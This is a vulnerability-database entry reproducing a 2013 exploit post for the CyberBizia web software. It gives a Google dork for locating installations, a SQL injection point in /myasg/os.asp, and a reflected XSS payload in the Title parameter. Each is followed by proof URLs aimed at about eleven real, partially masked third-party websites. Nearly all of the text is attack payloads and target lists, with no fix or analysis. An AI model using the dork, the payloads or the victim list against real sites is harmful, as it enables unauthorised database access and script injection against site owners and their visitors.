CyberBizia Multiple Vulnerabilities

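Vulnerability ID 1044549 Vulnerability type
Published 2013-08-29 Updated 2013-08-29
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2013080232
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit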
 #********************************************************************************
# Exploit Title : CyberBizia Multiple Vulnerabilities
#
# Software link : http://www.cyberbizia.com
#
# Exploit Author : Ashiyane Digital Security Team
#
# Tested on: Windows 7 , Linux
#
# Google Dork :  intext:"Powered by CyberBizia"
#
# Date: 2013/08/29
#
--------------------------------------------------------------------
# Exploit 1 : SQL Injection
#
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
#
#
# Proof:
#
# http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.artiXXXri.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.digXXXt.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cosXXXo.com/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.magXXweb.it/myasg/os.asp?elenca=mese&mese=1'
#
# http://www.archXXXeno.it/myasg/os.asp?elenca=mese&mese=1'
--------------------------------------------------------------------
# Exploit 2 : Cross-Site Scripting (XSS)
#
# Location : [Target]/?Title=[xss]
#
#
# Proof:
#
# http://www.advaXXXdiology.it/?Title="/><script>alert(1);</script>
#
# http://www.artXri.com/?Title="/><script>alert(1);</script>
#
# http://www.basketquartXXu.it/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonnXXXecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.digicsXXoft.it/?Title="/><script>alert(1);</script>
#
# http://www.costiaXXXuto.com/?Title="/><script>alert(1);</script>
#
# http://www.cdsdonXXnecagliari.it/?Title="/><script>alert(1);</script>
#
# http://www.baskXXuartu.it/?Title="/><script>alert(1);</script>
#
# http://www.iXXXarevacanze.it/?Title="/><script>alert(1);</script>
#
# http://www.mozXXXna.com/?Title="/><script>alert(1);</script>
#
# http://www.aXXXXXXleno.it/?Title="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################